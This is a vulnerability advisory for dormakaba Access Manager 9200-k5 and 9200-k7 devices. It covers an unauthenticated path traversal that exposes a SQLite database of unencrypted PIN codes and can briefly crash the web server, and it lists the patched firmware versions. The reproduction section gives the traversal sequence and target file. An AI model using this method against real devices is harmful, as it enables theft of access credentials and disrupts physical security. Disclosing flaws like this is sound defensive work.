dormakaba Access Manager Unauthenticated Path Traversal Vulnerability Allowing Arbitrary File Access

A path traversal vulnerability has been identified in the dormakaba Access Manager 9200-k5 and 9200-k7 hardware revisions, prior to their respective patch versions. This vulnerability allows unauthorized users to access files on the device's filesystem through crafted GET requests. Exploiting this flaw can lead to the retrieval of sensitive information, such as the SQLite database 'Database.sq3', which contains unencrypted PIN codes and other confidential data. Additionally, accessing certain files can cause the web server to crash, creating a denial-of-service condition that lasts approximately 60 seconds.

Impact

Successful exploitation of this vulnerability allows for unauthorized access to the device's filesystem, including sensitive data such as PIN codes and configuration information. The vulnerability can also be exploited to cause a temporary denial-of-service by crashing the web server, making the Access Manager unreachable for about 60 seconds.

Reproduction

The vulnerability can be reproduced by sending a GET request with the desired file path appended to the URL, using the 'path-as-is' option to bypass normal path handling. For example, to access the 'Database.sq3' file, the request would include the path traversal sequence '../../../../../' followed by the target file's location.

Remediation

Users are advised to update to the latest firmware version. For Access Manager 9200-k5, this means updating to version 04.06.189 RA or later. For Access Manager 9200-k7, users should ensure they are on version 05.01.088 RA or later.